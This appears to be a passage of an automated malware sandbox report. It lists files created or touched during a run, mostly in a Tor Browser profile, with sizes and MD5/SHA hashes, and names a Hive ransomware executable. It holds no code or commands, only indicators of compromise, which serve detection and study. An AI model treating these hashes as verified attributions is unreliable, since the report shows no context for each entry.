SHA512914983bfa336f9ea019bf5dc9ee403af56a6c7c1d88b8092609e4026a3377daa6ef9a8e51a93537f6769ae165c264763645a363fb6a89f8689f59caf985c18b2
-
Filesize
152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\datareporting\glean\db\data.safe.tmp
Filesize182B
MD51c3c58f7838dde7f753614d170f110fc
SHA1c17e5a486cecaddd6ced7217d298306850a87f48
SHA25681c14432135b2a50dc505904e87781864ca561efef9e94baeca3704d04e6db3d
SHA5129f6e9bcb0bba9e2ce3d7dabe03b061e3fda3f6d7b0249ecf4dbc145dc78844386d047ee2ac95656a025ef808cd0fc451204dc98a1981cf2729091761661a3b49
-
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\extension-store-menus\data.safe.tmp
Filesize245B
MD5e41a948534f6e10c71ad031683c27930
SHA13869650897d89fc67cb56bc0707bd3edea1b673b
SHA25669add43c45c18dc4e408430c5730ae23138d014d197ba53001a7c5bdeaf3f539
SHA512b10e7ea994cc96246a857d8f277650c73b50aadbf6bbcc84cdc39e2742aca845f9abdf77bc722ac4351dd669fbf902a76d97c5824be898728466798a4a006c35
-
Filesize
16KB
MD5c8c71d66b4474a50857e351ffb251d4e
SHA14afcd7a540397230c3752c91631782f9a7c7bf53
SHA2566ba086f38088e7d271e294b08dc0ca7535b356bb1b5b6deb55ffa546dbc7d8e6
SHA512162b5bfc48b892fdbd3734349fea7d55a2d8cfa4a175f663db196c9914fe8d09e4e02229f6fa520617b0b56294740a1593ca4fec09cf844e9c7a8249dfde5825
-
Filesize
1KB
MD5a86df315d0eb463ec89b724b34405d4b
SHA1a4559cdd6dbe241c3332875ffd42173fc877dc84
SHA2561c319be6e7a3ef90e9528de62ae3eb62d24fb42014897ec46273954f6499b90c
SHA512211dccd6e6e1c792d8f9d736dd96f44e60702e063be9da59589b374f7b50fe02cdafe7413656d120203306f2920a88600d32267b0a39c04b4a542fff8dd7f5ef
-
Filesize
2KB
MD5a4133f940152ce88087431c50656b3a2
SHA153a0d2bafacf64b4fefb6173a7e2271ddd531229
SHA256107747ea4b7ad6d69fced8255b6797f907b6c20632d0dcc77f8d2b582892b11d
SHA512a58a865b868e5ab60bcce1b7e1be7329e1f785d098346ab0e46b6d77ad328e5859069f1347450f348cc576c485094c521f86c3d04f3d3d7cf5082a119225e173
-
Filesize
4KB
MD506936156bbbf6d3f6e0f7906d5c987d7
SHA1899af796487f610ada2c0519193f8db3ad4f7840
SHA256ff776237a50cb989777bb7d186caa8172adc181b6cd3f0bd6f659328d300cfbb
SHA512adb3427cf17bb2a1528abb2e88707016dc559269b2c28c159e84bc13f9430f10956a58e664b7da3733dc7b5a1fddf1060251fb16e6ea3df67129960813f4ed08
-
Filesize
5KB
MD5ee7c3ad5114493cdf437a5e78d3cc83a
SHA152bf160d93890cc67d2b65359861cf5faa0a62d0
SHA256cc5ac0c37bb1990106bf6194da914197318e01903d378d819e280377e488a262
SHA5121f3114abf625da4c0a6aa304d375f28e193ca186c3675265a84937a239271c59e95d5786f2d82bd9525aa81810cd78efaf79a8801c40d4565a7ed8497a14de63
-
Filesize
5KB
MD510750b4e2793a6c0f88f2472b0412a38
SHA1a4b8e20913ec142ae8f6a5ab124243144b8e80fd
SHA2569bba50e186af227d690b7c34ec878b282e5d6bea7fbdbeb46209808a9dfc4288
SHA5126e3872bbe88c665561dbad820d51193c46f4d4de70f0a1c08c7fdd86495b0ab5045c2c742e1390bb7f96a59ed4ea38ec27340c5557653929a7e2e6a6dd59159d
-
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\sessionCheckpoints.json
Filesize241B
MD548fcad918c62db97e9af1dba1d131473
SHA1d89381594d3241b0e645033f67572a5d8c166764
SHA256dd8349e2789db1125b477971c5d445b6afb2f6ea3b57de65080631040900fe8c
SHA5122278d074aab519859188b047c77fe7b4db718e0af237b63e06a1b095d7a1eb4e07d6ea59cab5d7b1325aae0047fadea36eae12a80bfefe112aab85fc18aa1ca3
-
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize56KB
MD5a36e0e51d4aa9ad2e9a5147fabf97b59
SHA18ce5c2aed32adaf16e1ef342ef4cfad5f24a4372
SHA256aff8804bf8cf14344088ece60b92927d26ca3153027626ecd544aeb55b197d59
SHA512ad345cbc5f234479ae4ded925ebfb71c2f07c0ebc6f87bc9ab288a40dac754ef845e0d13f84283aba5b7d89ba16aa96cbd60b63aeeb72e854799358913913d76
-
Filesize
103B
MD55b0cb2afa381416690d2b48a5534fe41
SHA15c7d290a828ca789ea3cf496e563324133d95e06
SHA25611dedeb495c4c00ad4ef2ecacbd58918d1c7910f572bbbc87397788bafca265c
SHA5120e8aafd992d53b2318765052bf3fbd5f21355ae0cbda0d82558ecbb6304136f379bb869c2f9a863496c5d0c11703dbd24041af86131d32af71f276df7c5a740e
-
Filesize
3.0MB
MD5e55ca14fd1491132dcfe0e485d6f1731
SHA183a6e9e99a078b44967394f9613a7c22f3af6213
SHA256e94d7dec6f64d98592bbf27a392dca388031139a98d5ec8ada04a4a4ef719ff6
SHA512070f9a7da41b47042145070b78b6276a1ae88916f64cd9b578dfe2f7cbc28390c47b275a97e5aa9ebba929ff7259a8b86d7cc8b5d679523d8f589b55e8d09714
-
Filesize
14.2MB
MD544c87225cbb7fa16690429c073cc66bc
SHA13b0ef83d41a441acb3302d1a84d097f9e9e3a91e
SHA256a5868e944eb75986dc6590f31a14024bcb2b8b7923d6ff0bfd019b00ee334c7f
SHA512aa118166bcfbf52a1e736aae15cfb42e20a65fedcf2485dba29fee7e38d190bff7fe32450af55c5a025a69471c5f000ceb616929f625535f7b9ee42ec2564125
-
Filesize
26.0MB
MD5f4b3be035021ee5544d96362cd2a7344
SHA1da18bc322fd1ea65e3404ac946d54ae13376d0a5
SHA2565bba0d6d7a21ce131921ddfaaa8f0606c8882817435d2c839f1fa29e768fad85
SHA512fba469839ac42bcc5460d79cd609fd2040dc48dbf4d48fa152a894f81b262823f483cdc27b88c3b6ae45ac2657a2c133d51a71ac12ba7e7ae1af107b6d5d6fa4
-
Filesize
429B
MD53d84d108d421f30fb3c5ef2536d2a3eb
SHA10f3b02737462227a9b9e471f075357c9112f0a68
SHA2567d9d37eff1dc4e59a6437026602f1953ef58ee46ff3d81dbb8e13b0fd0bec86b
SHA51276cb3d59b08b0e546034cbb4fb11d8cfbb80703430dfe6c9147612182ba01910901330db7f0f304a90474724f32fd7b9d102c351218f7a291d28b3a80b7ac1e5
-
Filesize
55B
MD5a515bc619743c790d426780ed4810105
SHA1355dab227f0291b2c7f1945478eec7a4248578a0
SHA256612e53338b53449be39f2e9086e15edc7bb3e7aa56c9d65a9d53b9eb3c3cc77d
SHA51248ecd83a5eb1557dfabfaf588057e86fb4b7610f6ece119d6d89a38369d1c9426027520ce5b6d1cc79a4783b9f39ac58afb360cc76e05bbe8bbbd5128c5d395b
-
C:\Users\Admin\Desktop\Tor Browser\Browser\distribution\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
Filesize957KB
MD562c2b654a504e5e5ae9e51319b9e6005
SHA1b8f185129557bf8cbef1640f9393f4785e95cb63
SHA256f9639e63ffcfc352036de00e4ff6694bb0ca65a0bb8fbd103bd08f32dc1ff31a
SHA51287e7c642fb4dfee08a8f1136de61fa5c1a4ea5588c31492c0e6e76f378466e4a891ba7aecb7c20e2a772cb4ce6d6ae85863906ff80597bf7d43fe1423578c405
-
Filesize
1.7MB
MD54be3ccf24719e007e5a5627ba60af454
SHA1d8a39d80f12aad9465124d6f358ffa2bdae31e3d
SHA2569b3f487c3114a9c44dc4e4957cde1dc8c2225ab37f980550a5cc965a16f493de
SHA512a6683cf916fa6e16390b672357773a2b175ddef755613f3118836f72927ce7e2bbef2ce26d0807da04495e2379ac2f2db8ab4f10619983665757dbfb04e56b01
-
Filesize
296B
MD5b699245ef09504ebc6f7851bcd00524c
SHA17aa6fe2d8496f4d23f401d5867ebd174f6c1ff61
SHA25614014e6904c0a496afaf2a7ba6f63926d16d4e8695862d3af439954434765de1
SHA512d3a56cb9f0e9fa3fa4db87bf5e8eabf78cccc297ffbef3cd1f1969621c1bb50eda42ae8ccd40ffb06aa69fecad18c0ba8f800b501f1446b8aa454d2df06521ec
-
Filesize
979KB
MD5d60c017b0b04ca17623f81daef9db0d4
SHA1b624d9ade8bb02289c784efa22c1f2b284a6e802
SHA2565127e982a6488b8652bae72c33d0a385f25ef2e6df22053433732ad20663dad4
SHA51248998af675a3b05375623d67113766cc2ab793735bd5958f7c159fa5ce645c8008d2793465f14acd1fa189e61daae1cbc39c3ad5a3188d8f608428885aa1de95
-
Filesize
10.0MB
MD5f2a5dc020793c153b278afd8126ef112
SHA132470e07eba4d74e7f9483a067f843f30e6f372b
SHA256e1122e1ab5a8e30c9730b2588a8ab07c38b30bd9b9c4889d184733c715aa1b6f
SHA51221f316d51b9972b7bdd0a771107bd4e956d48757dadf39c895db08f558b42118bd03597b414c842375e6c9d65629a1d6d8df104d2243dbd5327152e8be2dd98c
-
Filesize
493KB
MD5bdb060418402961dd350fab4a308884d
SHA1b0d38531495514144a364a3d4b28a4a15afca67e
SHA256c419ac62dd0dcf3efc20f4cae81663d1f6113b8efd724b2fc3c461980c167704
SHA512efe1cb0029bda78ac3a149a66ab225a455eaf6d67276e4bc5e90f2db6a57c18b10a8b2ed3c45b2f966773f90ec968747aca412ae6c9fef8f2e3d1ea5e9a0dfd0
-
Filesize
1.4MB
MD586ba564fcbf7fe0ed10b1470d002548f
SHA1a527c13a0d9c0a337bf8e55a2713089354ddd8f8
SHA256583507b510b73b6034822b2ec537ca09a77cd8303d8cd25af8038a1f6e9dcf96
SHA5124c03fb794920a06340f7ebf2290f4e718164de5b4e9d1ec27f7b20124325d56a39f016829bb00b795232a4c805b5a17700c28da5b823038c1ed7f87ce669f5ae
-
Filesize
2.6MB
MD5ed4893890da4fe85cf5d7008e143df36
SHA1b17bef5d60bb9c2dd9fb4b7ff156598ecff00c07
SHA256c2ca65d7ff73438697efa6d6b58c820f9fb8babb8b65187670809d0ded1e97a3
SHA512d13215456b5a93caea23b9e88b31f0db22701fb5af925e09bfa996225cbde006465116b4f3246debb1a404aecf9ca44566058ce32d379652ec432927ac1db513
-
Filesize
480KB
MD5ba0a44f5162405e2463b61f451928d28
SHA1d9eea137857b3ad9411500b491bb8bff51d72d59
SHA2565e659b716a61240597414dc07d0fa0483a4ad5b816ed8a1b144bf1b2ae57965e
SHA512c3b9cdf00ebdb1c4755ded80fbfcaa9f3af4c7e64c0cd92d80e088724203c169b73c85b9b2f137688e913c1176eb6076cbc7bcf709b646eada8cedced8e41c3a
-
Filesize
18.6MB
MD57cdf9c83cf621bde2c8d3d1936ada9ac
SHA1bdbae18e983e09753d46542865d485a18d78b245
SHA256a232b53505e7e29f64b036fb79ac9bf2fdc5dedf39e48977126b694c506266b3
SHA512a690478d7bac8d300b0b3d553d32a1ec7547115b967acbf05f6ff0f8e33e8993321bee679055d18b239093babd51c8ef1e725ff8bf80415fa23e1d96ed5accb4
-
Filesize
301KB
MD58739b0383db6380f8132a059e9be70b8
SHA18904b072030bbd7e7b1948d462882851bed7de32
SHA256fa3a125533f2f71c90b96377306b3254199e8d8f1ee0ce1ae2140d46255b1888
SHA51214593b652f3fee337fe1c4f22fd784b61875e0e59fa28071bc8f1eaec9f2d1697ab1631fa419a815cf38d39fea292be372c1efa90dfbfa9c60c9cfea93882551
-
Filesize
829B
MD5a8fcdd518cb721cb435a6266c1956239
SHA19fb417d0eec6e25dcb7c90b763e590f3d22bd629
SHA2564f85851b241cf15f4152389e96ae995a45b1d4ce5ec68deaeb3dbd7b1a393003
SHA51286c25e0b8cc1c19d4495a0158d7741aa3d3038125023b36d928000940c5f4b8a5a0756f272aa8c3ace1dbf9d7dca143ae23db71e7e7373d21094582ab161da2c
-
C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
Filesize3.3MB
MD5c5ea00ea5973347d54d66f12fb5ee242
SHA19ce9fe05b746d949ac3095c7b8ed70a34948a0e5
SHA25636fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e
SHA512a6061f6d4b22f3e6561da3e2e27bbdf6e0e9ec812c2e584812d9e684c7e9dfb54c6454a8d818e65d82d89aa17e45d95a15e64e88e8ff33eab6fa284a68a1fe0f